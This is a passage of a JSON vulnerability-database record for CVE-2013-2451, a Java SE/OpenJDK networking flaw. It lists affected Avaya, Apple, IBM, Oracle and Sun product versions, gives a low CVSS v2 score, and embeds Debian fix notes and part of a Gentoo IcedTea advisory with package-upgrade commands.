"eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura presence services sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "aura conferencing standard", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura conferencing sp1 standard", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.4" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.3" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.4" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.3" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.2" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.1" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.8" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.4" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.2" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.3" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.4" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.3" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.2" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.8" }, { "model": "trio tview software", "scope": "ne", "trust": 0.3, "vendor": "schneider electric", "version": "3.29.0" }, { "model": "network and security manager software 2012.2r9", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "websphere real time sr5", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "websphere message broker", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.12" }, { "model": "virtualization engine ts7700", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.31.0.89" }, { "model": "tivoli system automation for integrated operations management", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.1.1.5" }, { "model": "lotus notes fix pack", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.5.35" }, { "model": "lotus domino fix pack", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.5.35" }, { "model": "java sdk sr5", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "java sdk sr6", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.0.1" }, { "model": "java sdk sr14", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "java sdk sr16-fp3", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "java sdk sr13-fp18", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.4.2" }, { "model": "integration bus", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.1" } ], "sources": [ { "db": "BID", "id": "60625" }, { "db": "CNNVD", "id": "CNNVD-201306-307" }, { "db": "NVD", "id": "CVE-2013-2451" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:*:update21:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.7.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:*:update21:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.7.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_16:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_20:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_19:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update32:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update30:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_21:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_14:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update27:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_12:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update35:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update26:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update25:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_18:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update39:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update33:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update24:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update31:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update22:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:*:update45:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.6.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update38:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update29:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update37:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update34:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update23:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update41:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update43:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_19:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_14:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update31:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_21:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_20:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_12:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update29:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update27:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_18:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update1_b06:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update25:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_16:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update33:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update32:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update24:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update23:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update22:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update30:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update38:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update37:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update35:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update34:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update26:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update39:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update41:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update43:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:*:update45:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.6.0", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2013-2451" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Red Hat", "sources": [ { "db": "PACKETSTORM", "id": "122405" }, { "db": "PACKETSTORM", "id": "126195" }, { "db": "PACKETSTORM", "id": "123735" }, { "db": "PACKETSTORM", "id": "122109" }, { "db": "PACKETSTORM", "id": "122404" } ], "trust": 0.5 }, "cve": "CVE-2013-2451", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "HIGH", "accessVector": "LOCAL", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 3.7, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 1.9, "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "LOW", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:L/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2013-2451", "trust": 1.0, "value": "LOW" }, { "author": "CNNVD", "id": "CNNVD-201306-307", "trust": 0.6, "value": "LOW" } ] } ], "sources": [ { "db": "CNNVD", "id": "CNNVD-201306-307" }, { "db": "NVD", "id": "CVE-2013-2451" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier and 6 Update 45 and earlier, and OpenJDK 7, allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Networking. NOTE: the previous information is from the June 2013 CPU. Oracle has not commented on claims from another vendor that this issue is related to improper enforcement of exclusive port binds when running on Windows, which allows attackers to bind to ports that are already in use. \nThis issue affects the \u0027Networking\u0027 sub-component. \nThis vulnerability affects the following supported versions:\n7 Update 21 , 6 Update 45. \n\nFor the oldstable distribution (squeeze), these problems have been fixed in\nversion 6b27-1.12.6-1~deb6u1. \n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 6b27-1.12.6-1~deb7u1. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 6b27-1.12.6-1. \n\nWe recommend that you upgrade your openjdk-6 packages. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201406-32\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: High\n Title: IcedTea JDK: Multiple vulnerabilities\n Date: June 29, 2014\n Bugs: #312297, #330205, #340819, #346799, #352035, #353418,\n #354231, #355127, #370787, #387637, #404095, #421031,\n #429522, #433389, #438750, #442478, #457206, #458410,\n #461714, #466822, #477210, #489570, #508270\n ID: 201406-32\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in the IcedTea JDK, the worst\nof which could lead to arbitrary code execution. \n\nBackground\n==========\n\nIcedTea is a distribution of the Java OpenJDK source code built with\nfree build tools. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 dev-java/icedtea-bin \u003c 6.1.13.3 \u003e= 6.1.13.3 \n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in the IcedTea JDK. \nPlease review the CVE identifiers referenced below for details. \n\nImpact\n======\n\nA remote attacker could possibly execute arbitrary code with the\nprivileges of the process, cause a Denial of Service condition, obtain\nsensitive information, bypass intended security policies, or have other\nunspecified impact. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll IcedTea JDK users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-java/icedtea-bin-6.1.13.3\"\n\nReferences\n==========\n\n[ 1 ] CVE-2009-3555\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3555\n[ 2 ] CVE-2010-2548\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2548\n[ 3 ] CVE-2010-2783\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2783\n[ 4 ] CVE-2010-3541\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3541\n[ 5 ] CVE-2010-3548\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3548\n[ 6 ] CVE-2010-3549\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3549\n[ 7 ] CVE-2010-3551\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3551\n[ 8 ] CVE-2010-3553\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3553\n[ 9 ] CVE-2010-3554\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3554\n[ 10 ] CVE-2010-3557\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3557\n[ 11 ] CVE-2010-3561\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3561\n[ 12 ] CVE-2010-3562\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3562\n[ 13 ] CVE-2010-3564\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3564\n[ 14 ] CVE-2010-3565\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3565\n[ 15 ] CVE-2010-3566\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3566\n[ 16 ] CVE-2010-3567\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3567\n[ 17 ] CVE-2010-3568\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3568\n[ 18 ] CVE-2010-3569\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3569\n[ 19 ] CVE-2010-3573\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3573\n[ 20 ] CVE-2010-3574\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3574\n[ 21 ] CVE-2010-3860\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3860\n[ 22 ] CVE-2010-4351\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4351\n[ 23 ] CVE-2010-4448\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4448\n[ 24 ] CVE-2010-4450\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4450\n[ 25 ] CVE-2010-4465\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4465\n[ 26 ] CVE-2010-4467\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4467\n[ 27 ] CVE-2010-4469\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4469\n[ 28 ] CVE-2010-4470\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4470\n[ 29 ] CVE-2010-4471\n 